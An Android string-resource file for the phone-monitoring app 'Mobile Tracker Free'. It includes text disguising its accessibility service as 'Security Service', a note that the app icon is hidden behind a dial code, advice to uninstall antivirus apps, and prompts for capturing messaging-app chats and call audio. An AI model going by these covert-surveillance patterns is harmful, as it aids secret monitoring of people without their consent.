<resources>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_font_family_body_1_material">sans-serif</string>
    <string name="abc_font_family_body_2_material">sans-serif-medium</string>
    <string name="abc_font_family_button_material">sans-serif-medium</string>
    <string name="abc_font_family_caption_material">sans-serif</string>
    <string name="abc_font_family_display_1_material">sans-serif</string>
    <string name="abc_font_family_display_2_material">sans-serif</string>
    <string name="abc_font_family_display_3_material">sans-serif</string>
    <string name="abc_font_family_display_4_material">sans-serif-light</string>
    <string name="abc_font_family_headline_material">sans-serif</string>
    <string name="abc_font_family_menu_material">sans-serif</string>
    <string name="abc_font_family_subhead_material">sans-serif</string>
    <string name="abc_font_family_title_material">sans-serif-medium</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="accessibility_description">Accessibility service</string>
    <string name="accessibility_enable_no">Access accessibility has not been activated.</string>
    <string name="accessibility_enable_ok">Access accessibility has been activated.</string>
    <string name="accessibility_facebook_write">Write a message</string>
    <string name="accessibility_facebook_write_bis">Type a message</string>
    <string name="accessibility_instagram_write">message…</string>
    <string name="accessibility_message">"Enabling accessibility allows you to retrieve messages sent to Facebook Messenger, WhatsApp, Viber and Snapchat.

Instructions: 
1) Search section 'Services'
2) Select '%1$s' 
3) Enable it."</string>
    <string name="accessibility_message_apps">"Enabling accessibility blocks applications.

Instructions: 
1) Search section 'Services'
2) Select '%1$s' 
3) Enable it."</string>
    <string name="accessibility_message_bis">Select %1$s and enable it.</string>
    <string name="accessibility_message_settings">Accessibility is useful for several features of the application (instant messaging, application blocking and website history).</string>
    <string name="accessibility_message_settings_bis">"Instructions: 
1) Search section 'Services'
2) Select '%1$s' 
3) Enable it."</string>
    <string name="accessibility_message_site">"Enabling accessibility allows you to retrieve history and block site Web.

Instructions: 
1) Search section 'Services'
2) Select '%1$s' 
3) Enable it."</string>
    <string name="accessibility_ok">GO</string>
    <string name="accessibility_snap_write">Send a Chat</string>
    <string name="accessibility_title">Enable accessibility</string>
    <string name="accuracy">Accuracy</string>
    <string name="action_close">Close</string>
    <string name="action_help">Help</string>
    <string name="action_info">Account Information</string>
    <string name="action_terms">Terms</string>
    <string name="action_uninstall">Uninstall</string>
    <string name="activateActivateAdmin">Activate</string>
    <string name="activateGPS">You just activated the GPS on the phone (</string>
    <string name="activateGPSD">The GPS was already enabled on the phone (</string>
    <string name="activateGPSE">Sorry, but the activation of GPS failed on the phone (</string>
    <string name="activateMobile">You just activated mobile phone data on the phone (</string>
    <string name="activateMobileD">You just deactivated mobile phone data on the phone (</string>
    <string name="activateMobileDE">Sorry but the deactivated of data mobile failed on the phone (</string>
    <string name="activateMobileE">Sorry but the activation of data mobile failed on the phone (</string>
    <string name="activateWifi">You just activated WiFi on the phone (</string>
    <string name="activateWifiD">The WiFi was already active on the phone (</string>
    <string name="activateWifiE">Sorry but the activation of WiFi failed on the phone (</string>
    <string name="activate_admin">Device admin enabled</string>
    <string name="activePermissions">Activate the permissions necessary for the proper functioning of the application</string>
    <string name="activePermissionsTitle">Activate all permissions</string>
    <string name="address">Address</string>
    <string name="addressNo">Address not available</string>
    <string name="alertNewPhone">Login here: https://mobile-tracker-free.com/ to track the phone.</string>
    <string name="alertNewPhoneBis">The application icon is hidden -> Call *1234* if you wish to open it!</string>
    <string name="anti_virus_warning">Warning - Antivirus</string>
    <string name="anti_virus_warning_text">"We have detected one or more Antivirus installed on the phone.
We recommend that you uninstall them or add %1$s to the whitelist.
Detected applications:"</string>
    <string name="app_name">Mobile Tracker Free</string>
    <string name="app_name_accessibility">Security Service</string>
    <string name="app_usage_enable_no">Access to usage data has not been enabled.</string>
    <string name="app_usage_enable_ok">Access to usage data has been enabled.</string>
    <string name="app_usage_message">Provides statistics on the use of installed applications.</string>
    <string name="app_usage_message_bis">Select %1$s and enable it.</string>
    <string name="app_usage_title">Usage data</string>
    <string name="appbar_scrolling_view_behavior">android.support.design.widget.AppBarLayout$ScrollingViewBehavior</string>
    <string name="apps_message">"Enable access to the usage data for that blocking works.
Setting -> Security-> App with usage access => %1$s"</string>
    <string name="apps_no">Access to user data has not been activated.</string>
    <string name="apps_ok">Access to user data has been activated.</string>
    <string name="apps_param">Setting</string>
    <string name="apps_usage_message">Please enable access to usage data for application blocking to work.</string>
    <string name="apps_warning">Warning</string>
    <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string>
    <string name="call_warning">Warning - Call Recording</string>
    <string name="call_warning_text">We have detected one or more applications installed on the phone that are used for call recording. If you do not uninstall the affected applications, %1$s will not be able to record calls correctly. Detected applications:</string>
    <string name="character_counter_pattern">%1$d / %2$d</string>
    <string name="check_root">Check whether the phone is rooted...</string>
    <string name="com.crashlytics.android.build_id">28a88ea5-cf14-4f33-8db7-958504e96a10</string>
    <string name="common_google_play_services_enable_button">Enable</string>
    <string name="common_google_play_services_enable_text">"%1$s won't work unless you enable Google Play services."</string>
    <string name="common_google_play_services_enable_title">Enable Google Play services</string>
    <string name="common_google_play_services_install_button">Install</string>
    <string name="common_google_play_services_install_text">"%1$s won't run without Google Play services, which are missing from your device."</string>
    <string name="common_google_play_services_install_title">Get Google Play services</string>
    <string name="common_google_play_services_notification_channel_name">Google Play services availability</string>
    <string name="common_google_play_services_notification_ticker">Google Play services error</string>
    <string name="common_google_play_services_unknown_issue">%1$s is having trouble with Google Play services. Please try again.</string>
    <string name="common_google_play_services_unsupported_text">"%1$s won't run without Google Play services, which are not supported by your device."</string>
    <string name="common_google_play_services_update_button">Update</string>
    <string name="common_google_play_services_update_text">"%1$s won't run unless you update Google Play services."</string>
    <string name="common_google_play_services_update_title">Update Google Play services</string>
    <string name="common_google_play_services_updating_text">"%1$s won't run without Google Play services, which are currently updating."</string>
    <string name="common_google_play_services_wear_update_text">New version of Google Play services needed. It will update itself shortly.</string>
    <string name="common_open_on_phone">Open on phone</string>
    <string name="common_signin_button_text">Sign in</string>
    <string name="common_signin_button_text_long">Sign in with Google</string>
    <string name="config_phone_activate_admin">Activate admin</string>
    <string name="config_phone_activate_admin_title">Activate admin</string>
    <string name="config_phone_name_phone">Name phone</string>
    <string name="config_phone_save_phone">Save</string>
    <string name="config_phone_social_info_root_no">"Your phone is not rooted. You can not use this feature.

For further explanation on the root of your phone, search: \"Rooted %1$s\" on Google."</string>
    <string name="config_phone_social_info_root_no_bis">Your phone is not rooted. You can not use this feature.</string>
    <string name="terms_1">By using Mobile Tracker Free application you agree to be bound by all of the following terms:</string>
    <string name="terms_2">"1) You are aware that this application can record, store and transmit information about phone usage and its user activity.
This includes, if enabled, SMS/MMS, calls, locations, photos, applications, calendar, contacts, history of web sites, clipboard, notifications, social network messages, audio recording of calls and audio/video of the ambient.
This data will be sent to the secure site https://mobile-tracker-free.com via the HTTPS protocol."</string>
    <string name="terms_3">"2) You are allowed to use this application only under the following conditions:
• You are using this application on a device that you own and personally use;
• You have explicit written consent of the owner and all users of the device to be monitored;
• You are a legal guardian of the user of the device to be monitored;"</string>
    <string name="terms_4">3) You know and comply with the laws and regulations that cover privacy, confidentiality and the use of such monitoring application in your local jurisdiction. You assume full responsibility for installing or using the application.</string>
    <string name="terms_5">4) You also acknowledge that neither Mobile Tracker Free nor any of the affiliates shall be liable for any damages, litigation or other legal actions arising out of your installation or use of Mobile Tracker Free.</string>
    <string name="terms_accept">ACCEPT</string>
    <string name="terms_decline">DECLINE</string>
</resources>